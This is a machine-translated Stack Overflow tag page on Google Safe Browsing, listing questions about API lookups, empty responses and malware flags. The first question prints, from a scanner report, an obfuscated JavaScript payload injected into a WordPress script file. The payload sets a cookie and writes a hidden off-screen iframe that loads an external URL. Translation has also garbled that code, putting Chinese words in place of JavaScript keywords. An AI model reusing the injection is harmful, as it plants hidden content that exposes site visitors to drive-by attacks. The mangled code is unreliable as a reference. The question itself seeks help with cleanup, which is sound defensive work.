问题标签 [safe-browsing]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票
1 回答
664 浏览

javascript - 如何修复报告的攻击页面?

我的 WordPress 网站被谷歌作为恶意网站阻止。经过大量研究,我找到了 Sucuri 并进行了扫描:

https://sitecheck.sucuri.net/results/www.zuzu.com

问题列举如下:

检测到问题 - 网站恶意软件

定义-mwjs-iframe-injected530?web.js.malware.pwframe.001

受感染的 URL http://www.zuzu.com/wp-includes/js/comment-reply.min.js?ver=f1397b4577f4eac1e6712291231852a5

有效载荷:

已知的 JavaScript 恶意软件。细节: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530? web.js.malware.pwframe.001var _0xdc56=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\ x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\ x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D"," \x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\ x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\ x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x74\x72\x79\x6D\x79\x66\x69\x6E\x67\x65\x72 \x2E\x77\x65\x62\x73\x69\x74\x65\x2F\x61\x64\x2F\x3F\x69\x64\x3D\x36\x39\x34\x33\x36\x33\x31\x26\x6B \x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x76\x65\x72\x74\x3D\x55\x48\x68\x75\x79\x34","\x69 \x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\ x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\ x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\ x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66 \x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xdc56[0]]=function(){function _0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5= new Date();_0x739ex5_0xdc56[2] ;};if(_0x739ex2&&_0x739ex3){document[_0xdc56[3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}否则{返回false};} function _0x739ex6(_0x739ex2){var _0x739ex3= new RegExp(_0x739ex2+_0xdc56[8]);var _0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56[10] return _0x739ex4[1]?_0x739ex4[1]:false;}var _0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1) ;var _0x739ex8=document_0xdc56[14];var _0x739ex9=925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739exa+[ [_0xdc56[21]]_0xdc56[20];};};窗口[_0xdc56[0]]=function(){function _0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5= new Date();_0x739ex5_0xdc56[2];};if(_0x739ex2&[_0x739exx3){文档[3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}else {return false};}function _0x739ex6(_0x739ex2){var _0x739ex3= new RegExp (_0x739ex2+_0xdc56[8]);var _0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56[10]}否则{返回false};返回_0x739ex4[1]::_0x739ex4[1] false;}var _0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1);var _0x739ex8=document_0xdc56[14];var _0x739ex9 =925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739exa+_0xdc56[19];文档[_0xdc56[21]]_0xdc56[20]; };};窗口[_0xdc56[0]]=function(){function _0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5= new Date();_0x739ex5_0xdc56[2];};if(_0x739ex2&[_0x739exx3){文档[3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}else {return false};}function _0x739ex6(_0x739ex2){var _0x739ex3= new RegExp (_0x739ex2+_0xdc56[8]);var _0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56[10]}否则{返回false};返回_0x739ex4[1]::_0x739ex4[1] false;}var _0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1);var _0x739ex8=document_0xdc56[14];var _0x739ex9 =925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739exa+_0xdc56[19];文档[_0xdc56[21]]_0xdc56[20]; };};

我接下来需要做什么才能删除此恶意软件?

0 投票
3 回答
1222 浏览

node.js - 谷歌安全浏览 API 查找 Node.js

我无法让谷歌安全搜索查找正常工作。这是我正在尝试的代码,我总是得到{}响应

不确定我是否正确理解了文档,或者我的请求中是否遗漏了任何参数。我尝试过使用不同的网址。尝试从网络中搜索被我的浏览器识别为恶意的恶意网址,但这些网址也返回空白响应。这是我正在关注的文档

我也尝试了他们的threatLists:listAPI,但总是出错

这是我得到的输出:

0 投票
1 回答
1589 浏览

php - 安全浏览查找 API (v4) 收到无效的 JSON 有效负载

我有一个 php 脚本,它尝试使用 google Safe Browsing Lookup API (v4),但我收到错误“收到无效的 JSON 有效负载。未知名称\”\“:根元素必须是一条消息...”

这是我的代码:

json-data 数组格式是否有问题或可能是什么问题?

0 投票
1 回答
602 浏览

php - 安全浏览 API v4。- 空响应

我已经实现了安全浏览 API。我有声明为域的phishing域。我已经对它们进行了测试,作为响应,我得到了空数组。

我的问题是,谷歌安全浏览 API 有类型PHISHING了吗?我已经获取了安全浏览列表,但我只找到了这些类型:

MALWARE,
UNWANTED_SOFTWARE,
SOCIAL_ENGINEERING,
POTENCIALLY_HARMFUL_APPLICATION

现在我很担心,因为我无法在phishing类型上测试我的域。

有谁知道这件事?

0 投票
0 回答
175 浏览

security - Google 的安全浏览恶意软件标记和 Bit.ly 自定义域

我正在尝试更好地了解如何在bit.ly不被Google 的 Safe Browsing Site Status标记的情况下实现自定义域。

据我了解,如果您的网站上有指向另一个已被 Google 标记的网站的链接,您可能会被 Google 标记。

如果您使用您的域来缩短 URL,这将如何工作?

例如,Bitly 被 Google 标记为“潜在危险”而不是“危险”,因此该域不会添加到浏览器恶意软件黑名单中。Bitly 能够链接到标记为“危险”的网站而不会被列入黑名单,但如果发生相同事件,自定义域会收到“危险”标记。

如果您链接到的网站被标记为“危险”,有没有办法实现自定义域而bit.ly不会被谷歌列入黑名单?

屏幕截图 1 - 网站未被 Google 的安全浏览网站状态标记

屏幕截图 2 - 站点被标记为部分危险

屏幕截图 3 - 站点标记为危险

0 投票
1 回答
1883 浏览

python - Google 安全浏览 API v4 和 Python 请求的意外响应

我正在尝试实现一个小功能来验证可能的网络钓鱼 URL,并认为使用 Google 安全浏览 API 将是一个好的开始。

在阅读了 API 文档后,我想我已经掌握了一些东西,并拼凑了以下代码:

如果我做一个

print (json.dumps(payload, indent=4)

一切看起来都很好。但是,我从 Google 收到的回复不同意。

{'error': {'message': '收到无效的 JSON 有效负载。\'threat_info\' 中的未知名称“threat_entries:”:找不到字段。','status':'INVALID_ARGUMENT','code':400,'details':[{'@type':'type.googleapis.com /google.rpc.BadRequest', 'fieldViolations': [{'field': 'threat_info', 'description': '收到无效的 JSON 有效负载。未知名称 "threat_entries:" at \'threat_info\': 找不到字段。'}]}]}} {'X-Frame-Options': 'SAMEORIGIN', 'Transfer-Encoding': 'chunked', 'Cache-控制':'私人','日期':'星期二,2016 年 10 月 25 日 07:55:30 GMT','内容类型':'application/json; 字符集=UTF-8','Alt-Svc':'quic=":443"; 马=2592000;v="36,35,34,33,32"', 'X-Content-Type-Options': 'nosniff', 'Content-Encoding': 'gzip', 'X-XSS-Protection': '1; 模式=块','服务器':'ESF'}应用程序/json;字符集=UTF-8

我不能 - 像往常一样 - 发现我的错误。其他人可以发现它并可能让我走上正确的轨道吗?

0 投票
0 回答
31 浏览

php - 当他们弃用 API 时,我如何从 Google 获得通知?

最近,我们的整个网站都受到了阻碍,因为我们使用了他们最近弃用的 Google 安全浏览 API 代码。如果我们知道,我们就会迁移到最新的 API。在我们不知情的情况下,这并不是唯一改变我们的 Google api。我们如何从 Google 那里获得他们即将弃用 api 的通知?

0 投票
0 回答
198 浏览

safe-browsing - 哪个数据库可以用来存储从 google safebrowsing api 获得的哈希前缀?

用于存储从 google safebrowsing api https://developers.google.com/safe-browsing/v4/获得的数据(url 的哈希前缀),推荐使用哪个数据库?

我想创建一个本地数据库来存储从 google safebrowsing api 获得的哈希前缀和完整哈希。为了检查数据库的完整性,我们需要在每次更新调用后按字典顺序计算本地数据库中前缀的sha-256(校验和)。

有没有人试图做与我的要求类似的事情?

0 投票
1 回答
1984 浏览

httprequest - Google 安全浏览 API v4 - 空响应

尽管我检查了恶意 URL ( http://fileserver03.com ),但从Google Safe Browsing API v4.

这是我尝试过的代码:

这是输出:

0 投票
1 回答
100 浏览

php - 来自 google 安全浏览 api 数组的回显结果

我知道这是一个基本问题,但我无法弄清楚如何实际做到这一点。我已经阅读了无数关于它的教程,但它们似乎不起作用。

返回以下内容:

我想从数组中回显结果,所以像

问题是这会在匹配和威胁上返回非法偏移,并且只回显单个字符 {

我究竟做错了什么?如何在不转储整个数组的情况下回显该数组的结果?